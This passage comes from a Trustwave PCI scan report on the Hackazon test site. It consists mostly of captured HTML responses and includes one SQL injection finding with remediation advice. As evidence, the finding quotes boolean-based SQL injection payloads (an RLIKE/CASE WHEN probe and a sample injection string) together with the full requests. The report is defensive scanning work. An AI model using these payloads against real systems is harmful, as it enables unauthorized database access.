var xiSwfUrlStr = "/swf/playerProductInstall.swf";
var flashvars = {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 841 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
host: "http://hackazon.webscantest.com"
};
var params = {};
params.quality = "high";
params.bgcolor = "#ffffff";
params.allowscriptaccess = "sameDomain";
params.allowfullscreen = "false";
var attributes = {};
attributes.id = "SliderBanner";
attributes.name = "SliderBanner";
attributes.align = "middle";

$(function () {
if ($('#flashBanner').length) {
setTimeout(function () {
swfobject.embedSWF(
"/swf/SliderBanner.swf", "flashBanner",
"360", "290",
swfVersionStr, xiSwfUrlStr,
flashvars, params, attributes);
// JavaScript enabled so display the flashContent div in
case it is not replaced with a swf object.
swfobject.createCSS("#flashBanner", "display:block;text-
align:left;");
}, 300);
}
});
</script>

</head>
<body class="">
<header class="hw-header">
<nav class="navbar hw-navbar navbar-fixed-top" role="navigation"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 842 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed"
data-toggle="collapse" data-target="#hw-navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand hw-navbar-brand" href="/"><!--
span>Hackazon <em>Webscantest</em></span--><img src="
/images/Hackazon.png"></a>
</div>
<!-- Collect the nav links, forms, and other content for toggling
-->
<div class="collapse hw-navbar-collapse navbar-collapse
navbar-ex1-collapse" id="hw-navbar">
<ul class="nav navbar-nav navbar-right">
<li><a href="/faq">FAQ</a></li>
<li><a href="/contact">Contact Us</a></li>
<li class="
dropdown">
<a href="
/wishlist" class="dropdown-toggle" data-toggle="dropdown">Wish List
<b class="caret"></b></a>
<ul class="
dropdown-menu">

<li><a href="/wishlist/">Wish Lists</a></li>


</ul>
</li>
<li class="dropdown">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 843 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a href="#" class="dropdown-toggle
hw-account-link" data-toggle="dropdown">Your account
<img
src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAA
eCAIAAAHDVQljAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR
5ccllPAAAA7NJREFUeNpiXHHi/o/ffxnAgAnI+vvvv5mSMJDBBBT4/fcfRIZFg
ItNTYIXyLJTFwMIIMYFh+8wwABID1CDGB8HVA8Q3H/9BUgyXn/2/v9/EP/7
778AAQTSAzHdUVMcKHTu4bsvP/6A9EO0cLExQxi6MgJQgyHU119Qx118
9B7CYLz5/APQHAYMABBAKO6CAxaI95w0xf/8+8/CxLjv+kuE6X/BDvwDM
40JTS/E+VDRe6++AklmJkZGRpgoUF5WmBPIABoAMQSL44B2MmG6F6g
cIICgYQIXAioCBqOsMNev3/8uP/kAtAnFGGQOGwuTpYoIxHkMHAzAMH3x
8cetF58Q0YJi19//UEfjACiqf//79/vPP0SoMjK8+vQDp2pmRsYjt17D3fr47bf
3336huxvoM252Fn1ZQS52ZiAbHhoyQlxA7wKNuPv6y91XX0Bhe+v5hz/Y
IhcrAAgg7DGOFXCwMrMgBzbYZ4wqYjy8nKwP33wFehFfeIvwsuvICPwDO
0xbmh+YSPddf8GEFKZMyGlGXYLvH5IfgOb+/487vP8zoHv3P87YYWT4h
RQ1EKWMuFT///+fnZUZWQ7oKGDKwa4a6JvbLz4jJxNg7v+NahuK1mcfvr
MgBdm1px+ZUEMQPZ28/vITymZifPf1J840+AeUWpgFudjg2cJGTQwoiByI
LP/BEspiPMqiPMBcjCLHxOiqLfHt598Lj99/+wkqZBjP3n/Dy8GCP2EBvQ4M
g+vPPrFwsjETTINAC4HWaknxMTEQDYBGAgRotcpyGoaBaLxlaVrSQgCpS
CyH4Lochj8ugJBAiB9AVC2kVbpkdZ8TBFVSW61UK/KP7fF43jIhd/fPDQjbm
0AeqSqmcqqJ1OBmewBWTvUaR6mGA+869Ds2J9Udsqo4ZhjHZ7T8nqe
6KxCWG5K9vTkJOmJT1Ypo1Xzac4Z992WktM014beXDwXwBINblFIaEOC
U7upqm89BP1qkBbFMNV2k+d6hkaxv867DpT7rQlpXIcyQ6rbos05z1WL
1TABJkqyAanU8oAYYYeJv4zlnW44Cusf36OF1YiCYCQfGyCROslyS1puiZT
aaJYLtD+NvxUsZeAJZyxYSfU9cDLy8MGmNN84of2Qk7DrngXfUEYLSrT8a
uTKe3mXozxbZ13Q5jpO0kLSyj//QNXOPffsscMOuC92VpfVHZwOvsQSzH
Pg2PkQExdNcjuPVaLqCSrFKnj5+0LuKndvkLgPkAWvpwePW5oOwnCmxlt
ahB8KuAf+pyQJVxN7hAAAAAElFTkSuQmCC" id="loginusericon"
class="userpic small" class="header-user-photo"><b
class="caret"></b></a>
<ul class="dropdown-menu">
<li><a href="/account/orders">My orders</a></li>
<li><a href="/account#profile">My profile</a></li>
<li><a href="/account/documents">My

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 844 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
documents</a></li>
<li><a href="/account/help_articles">Help
Articles</a></li>
<li><a href="/helpdesk">Helpdesk</a></li>
</ul>
</li>
<li class="dropdown hw-login-item">

<a href="/user/logout" class="login-window">Logout</a>


</li>
<li class="dropdown">
<a class="dropdown-toggle js-cart-top-icon" data-
toggle="dropdown" href="#"><span class="glyphicon glyphicon-
shopping-cart"></span></a>
<ul class="dropdown-menu js-cart-top-list cart-top-list"
>
<li><a href="/product/view?id=64"><span class="
pull-left product-name"><small>113x</small>
Molton Brown Indian Cress Purifying Shampoo, 10 fl. oz.
</span> &nbsp; <small class="pull-right label label-info">$ 3390,-
</small></a></li><li><a href="/product/view?id=1"><span class="
pull-left product-name"><small>6x</small>
Martha Stewart Crafts Garland, Pink Pom Pom Small
</span> &nbsp; <small class="pull-right label label-info">$ 54,-
</small></a></li><li><a href="/product/view?id=101"><span
class="pull-left product-name"><small>1x</small>
Diesel Men's Sleenker Skinny-Leg Jean 0608D
</span> &nbsp; <small class="pull-right label label-info">$ 238,-
</small></a></li><li><a href="/product/view?id=81"><span
class="pull-left product-name"><small>1x</small>
Native Forest Organic Classic Coconut Milk, 13.5-Ounce Cans (Pack of
12)
</span> &nbsp; <small class="pull-right label label-info">$ 30,-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 845 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</small></a></li><li><a href="/product/view?id=154"><span
class="pull-left product-name"><small>1x</small>
Ninja Master Prep (QB900B)
</span> &nbsp; <small class="pull-right label label-info">$ 39,-
</small></a></li><li><a href="/product/view?id=42"><span
class="pull-left product-name"><small>1x</small>
Hairfinity Hair Vitamins 60 capsules
</span> &nbsp; <small class="pull-right label label-info">$ 37,-
</small></a></li> <li class="divider"></li>
<li><a href="/cart/view">Show all items in shopping
cart <i class="glyphicon glyphicon-chevron-right"></i></a></li>
</ul>
</li>
</ul>
</div>
<div class="row">
<div class="col-xs-12 col-md-12 col-lg-12">
<div class="row">
<form role="search" action="/search" method="get"
id="searchForm" >
<input type="hidden" name="id" value="" />
<div class="col-xs-12 col-md-12">
<div class="input-group" style="margin-bottom: 10px;">
<div class="input-group-btn">
<button type="button" class="btn btn-default dropdown-
toggle" data-toggle="dropdown" id="searchLabel">All <span
class="caret"></span></button>
<ul class="dropdown-menu" role="menu"
id="searchValue">
<li class="dropdown"><a href="#">All</a></li>
<li class="dropdown
dropdown-submenu"><a href="/category/view?id=49" data-item-
id="49">Unlimited Instant Videos</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 846 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=52" data-item-id="52">Shop Instant
Video</a>
<li><a
href="/category/view?id=51" data-item-id="51">Prime Instant
Video</a>
<li><a
href="/category/view?id=50" data-item-id="50">Amazon Instant
Video</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=44" data-item-id="44">Test
Fire TV</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=48" data-item-id="48">Test Fire TV</a>
<li><a
href="/category/view?id=47" data-item-id="47">Test Fire Game
Controller</a>
<li><a
href="/category/view?id=46" data-item-id="46">Prime Instant
Video</a>
<li><a
href="/category/view?id=45" data-item-id="45">Games for Fire
TV</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=38" data-item-id="38">Sports
& Outdoors</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 847 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a
href="/category/view?id=42" data-item-id="42">Golf</a>
<li><a
href="/category/view?id=41" data-item-id="41">Fan Shop</a>
<li><a
href="/category/view?id=40" data-item-id="40">Cycling</a>
<li><a
href="/category/view?id=39" data-item-id="39">Athletic & Outdoor
Clothing</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=32" data-item-id="32">Home,
Garden & Tools</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=37" data-item-id="37">Patio, Lawn &
Garden</a>
<li><a
href="/category/view?id=36" data-item-id="36">Kitchen & Dining</a>
<li><a
href="/category/view?id=35" data-item-id="35">Furniture &
Decor</a>
<li><a
href="/category/view?id=34" data-item-id="34">Bedding & Bath</a>
<li><a
href="/category/view?id=33" data-item-id="33">Appliances</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=26" data-item-
id="26">Electronics & Computers</a>
<ul class="dropdown-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 848 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a
href="/category/view?id=31" data-item-id="31">Printers & Ink</a>
<li><a
href="/category/view?id=30" data-item-id="30">Musical
Instruments</a>
<li><a
href="/category/view?id=29" data-item-id="29">Cell Phones &
Accessories</a>
<li><a
href="/category/view?id=28" data-item-id="28">Car Electronics</a>
<li><a
href="/category/view?id=27" data-item-id="27">CAMERA, PHOTO &
VIDEO</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=20" data-item-
id="20">Clothing, Shoes & Jewelry</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=25" data-item-id="25">Women</a>
<li><a
href="/category/view?id=24" data-item-id="24">Men</a>
<li><a
href="/category/view?id=23" data-item-id="23">Girls</a>
<li><a
href="/category/view?id=22" data-item-id="22">Boys</a>
<li><a
href="/category/view?id=21" data-item-id="21">Baby</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=14" data-item-id="14"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 849 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Beauty, Health & Grocery</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=19" data-item-id="19">Natural &
Organic</a>
<li><a
href="/category/view?id=18" data-item-id="18">Mens Grooming</a>
<li><a
href="/category/view?id=17" data-item-id="17">Luxury Beauty</a>
<li><a
href="/category/view?id=16" data-item-id="16">Health, Household &
Baby Care</a>
<li><a
href="/category/view?id=15" data-item-id="15">All beauty</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=8" data-item-
id="8">Automotive & Industrial</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=10" data-item-id="10">Automotive Tools &
Equipment</a>
<li><a
href="/category/view?id=9" data-item-id="9">Automotive Parts &
Accessories</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=2" data-item-id="2">Arts,
Crafts & Sewing Coupons</a>
<ul class="dropdown-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 850 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
menu">
<li><a
href="/category/view?id=7" data-item-id="7">Sewing</a>
<li><a
href="/category/view?id=6" data-item-id="6">Scrapbooking</a>
<li><a
href="/category/view?id=5" data-item-id="5">Painting</a>
<li><a
href="/category/view?id=4" data-item-id="4">Jewelry-Making</a>
<li><a
href="/category/view?id=3" data-item-id="3">Craft Supplies</a>
</ul>
</li>
</ul>
</div>
<!-- /btn-group -->
<input type="text" class="form-control"
placeholder="Search products..." maxlength="100"
name="searchString" value="">
<span class="input-group-btn">
<button class="btn btn-default"
type="submit">Search!</button>
</span>
</div>
<!-- /input-group -->
</div>
</form>
</div> </div>
</div>
</div>
<!-- /.container -->
</nav>
</header>
<div id="container">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 851 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div class="container">
<div class="row">
<div class="col-lg-12">
<h1 class="page-header">Error: 404 Invalid product id</h1>
<ol class="breadcrumb">
<li><a href="/">Home</a></li>
<li class="active">Error</li>
</ol>
</div>

</div>
<div class="row error-page">
<div class="col-lg-12">
<p>Please try to change your request.</p>
</div>
</div>
</div> </div>

<div class="container" >


<hr>
<footer>
<div class="row">
<div class="col-lg-12">
<p>Copyright &copy; NTObjectives 2014</p>
</div>
</div>
</footer>

<script type="text/x-template" id="tplAlertContent">


<div class="text-center">
<a href="#" class="btn btn-primary js-yes">Yes</a>
<a href="#" class="btn btn-danger js-no">No</a>
</div>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 852 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</script> </div>
</body>
</html>

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

6 SQL Injection Vulnerability 7.5 High Fail URL: http://69.164.223.171/category/view?id=%27+RLIKE+%28SEL


ECT+%28CASE+WHEN+%2819%3D20%29+THEN+0x746578
7476616c7565+ELSE+0x28+END%29%29--+

Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 853 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
GET -
http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%2
8CASE+WHEN+%2819%3D20%29+THEN+0x7465787476616c7565+E
LSE+0x28+END%29%29--+ - id
False Injection: ' RLIKE (SELECT (CASE WHEN (19=20) THEN
0x7465787476616c7565 ELSE 0x28 END))--
True Injection: ' RLIKE (SELECT (CASE WHEN (19=19) THEN
0x7465787476616c7565 ELSE 0x28 END))--
True Request: GET
http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%2
8CASE+WHEN+%2819%3D19%29+THEN+0x7465787476616c7565+E
LSE+0x28+END%29%29--+ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 854 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

True Response: HTTP/1.1 404 Not Found


Date: Tue, 06 Aug 2019 04:17:03 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Status: 404 Not Found
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Hackazon &mdash; Error: 404 No such category</title>

<meta name="viewport" content="width=device-width, initial-


scale=1.0">
<meta name="description" content="">
<meta name="author" content="">

<!-- Bootstrap core CSS -->


<link href="/css/bootstrap.css" rel="stylesheet">

<!-- Fonts -->


<!--link rel="stylesheet" type="text/css"
href="//fonts.googleapis.com/css?family=McLaren">
<link href='//fonts.googleapis.com/css?family=Ubuntu:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 855 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
300,400,500,700,300italic,400italic,500italic,700italic' rel='stylesheet'
type='text/css'-->
<link href="/font-awesome/css/font-awesome.min.css"
rel="stylesheet">

<!-- Libraries -->


<link href="/css/ekko-lightbox.css" rel="stylesheet">
<link href="/css/star-rating.min.css" rel="stylesheet">
<link href="/css/nivo-slider.css" rel="stylesheet">
<link href="/css/nivo-themes/bar/bar.css" rel="stylesheet">
<link href="/css/nivo-themes/light/light.css" rel="stylesheet">
<link href="/css/bootstrapValidator.css" rel="stylesheet">
<link href="/css/modern-business.css" rel="stylesheet">
<link href="/css/ladda-themeless.min.css" rel="stylesheet">

<!-- Add custom CSS here -->


<link href="/css/subcategory.css" rel="stylesheet">
<link href="/css/site.css" rel="stylesheet">
<link href="/css/sidebar.css" rel="stylesheet">

<script type="text/javascript">
var App = window.App || {};
App.config =
{"host":"http:\/\/69.164.223.171","user":{"id":"209","username":"CHSu
ser","first_name":"John","last_name":"Smith","user_phone":"408555123
4","email":"jsmith20@kelev.biz","created_on":"2019-08-05
21:24:27","photo":null,"photoUrl":null},"baseImgPath":"\/user_pictures\
/","dataType":"xml"};
</script>

<!-- JavaScript -->


<script src="/js/jquery-1.10.2.js"></script>
<script src="/js/json3.min.js"></script>
<script src="/js/jquery.dump.js"></script>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 856 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<script src="/js/jquery-migrate-1.2.1.js"></script>
<script src="/js/bootstrap.js"></script>
<script src="/js/modern-business.js"></script>
<script src="/js/bootstrapValidator.min.js"></script>
<script src="/js/jquery.validate.min.js"></script>
<script src="/js/spin.min.js"></script>
<script src="/js/moment.min.js"></script>
<script src="/js/jquery.modern-blink.js"></script>
<script src="/js/ladda.min.js"></script>
<script src="/js/ladda.jquery.min.js"></script>
<script src="/js/jquery.inputmask.js"></script>
<script src="/js/ekko-lightbox.js"></script>
<script src="/js/jquery.nivo.slider.pack.js"></script>
<script src="/js/respond.min.js"></script>
<script src="/js/star-rating.min.js"></script>
<script src="/js/bootstrap.file-input.js"></script>
<script src="/js/knockout-2.2.1.js"></script>
<script src="/js/knockout.localStorage.js"></script>
<script src="/js/koExternalTemplateEngine_all.min.js"></script>
<script src="/js/amf/services.js"></script>
<script src="/js/swfobject.js"></script>

<script src="/js/tools.js"></script>
<script src="/js/site.js"></script>

<script type="text/javascript">
// For version detection, set to min. required Flash Player version,
or 0 (or 0.0.0), for no version detection.
var swfVersionStr = "11.1.0";
// To use express install, set to playerProductInstall.swf, otherwise
the empty string.
var xiSwfUrlStr = "/swf/playerProductInstall.swf";
var flashvars = {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 857 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
host: "http://69.164.223.171"
};
var params = {};
params.quality = "high";
params.bgcolor = "#ffffff";
params.allowscriptaccess = "sameDomain";
params.allowfullscreen = "false";
var attributes = {};
attributes.id = "SliderBanner";
attributes.name = "SliderBanner";
attributes.align = "middle";

$(function () {
if ($('#flashBanner').length) {
setTimeout(function () {
swfobject.embedSWF(
"/swf/SliderBanner.swf", "flashBanner",
"360", "290",
swfVersionStr, xiSwfUrlStr,
flashvars, params, attributes);
// JavaScript enabled so display the flashContent div in
case it is not replaced with a swf object.
swfobject.createCSS("#flashBanner", "display:block;text-
align:left;");
}, 300);
}
});
</script>

</head>
<body class="">
<header class="hw-header">
<nav class="navbar hw-navbar navbar-fixed-top" role="navigation"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 858 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed"
data-toggle="collapse" data-target="#hw-navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand hw-navbar-brand" href="/"><!--
span>Hackazon <em>Webscantest</em></span--><img src="
/images/Hackazon.png"></a>
</div>
<!-- Collect the nav links, forms, and other content for toggling
-->
<div class="collapse hw-navbar-collapse navbar-collapse
navbar-ex1-collapse" id="hw-navbar">
<ul class="nav navbar-nav navbar-right">
<li><a href="/faq">FAQ</a></li>
<li><a href="/contact">Contact Us</a></li>
<li class="
dropdown">
<a href="
/wishlist" class="dropdown-toggle" data-toggle="dropdown">Wish List
<b class="caret"></b></a>
<ul class="
dropdown-menu">

<li><a href="/wishlist/">Wish Lists</a></li>


</ul>
</li>
<li class="dropdown">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 859 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a href="#" class="dropdown-toggle
hw-account-link" data-toggle="dropdown">Your account
<img
src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAA
eCAIAAAHDVQljAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR
5ccllPAAAA7NJREFUeNpiXHHi/o/ffxnAgAnI+vvvv5mSMJDBBBT4/fcfRIZFg
ItNTYIXyLJTFwMIIMYFh+8wwABID1CDGB8HVA8Q3H/9BUgyXn/2/v9/EP/7
778AAQTSAzHdUVMcKHTu4bsvP/6A9EO0cLExQxi6MgJQgyHU119Qx118
9B7CYLz5/APQHAYMABBAKO6CAxaI95w0xf/8+8/CxLjv+kuE6X/BDvwDM
40JTS/E+VDRe6++AklmJkZGRpgoUF5WmBPIABoAMQSL44B2MmG6F6g
cIICgYQIXAioCBqOsMNev3/8uP/kAtAnFGGQOGwuTpYoIxHkMHAzAMH3x
8cetF58Q0YJi19//UEfjACiqf//79/vPP0SoMjK8+vQDp2pmRsYjt17D3fr47bf
3336huxvoM252Fn1ZQS52ZiAbHhoyQlxA7wKNuPv6y91XX0Bhe+v5hz/Y
IhcrAAgg7DGOFXCwMrMgBzbYZ4wqYjy8nKwP33wFehFfeIvwsuvICPwDO
0xbmh+YSPddf8GEFKZMyGlGXYLvH5IfgOb+/487vP8zoHv3P87YYWT4h
RQ1EKWMuFT///+fnZUZWQ7oKGDKwa4a6JvbLz4jJxNg7v+NahuK1mcfvr
MgBdm1px+ZUEMQPZ28/vITymZifPf1J840+AeUWpgFudjg2cJGTQwoiByI
LP/BEspiPMqiPMBcjCLHxOiqLfHt598Lj99/+wkqZBjP3n/Dy8GCP2EBvQ4M
g+vPPrFwsjETTINAC4HWaknxMTEQDYBGAgRotcpyGoaBaLxlaVrSQgCpS
CyH4Lochj8ugJBAiB9AVC2kVbpkdZ8TBFVSW61UK/KP7fF43jIhd/fPDQjbm
0AeqSqmcqqJ1OBmewBWTvUaR6mGA+869Ds2J9Udsqo4ZhjHZ7T8nqe
6KxCWG5K9vTkJOmJT1Ypo1Xzac4Z992WktM014beXDwXwBINblFIaEOC
U7upqm89BP1qkBbFMNV2k+d6hkaxv867DpT7rQlpXIcyQ6rbos05z1WL
1TABJkqyAanU8oAYYYeJv4zlnW44Cusf36OF1YiCYCQfGyCROslyS1puiZT
aaJYLtD+NvxUsZeAJZyxYSfU9cDLy8MGmNN84of2Qk7DrngXfUEYLSrT8a
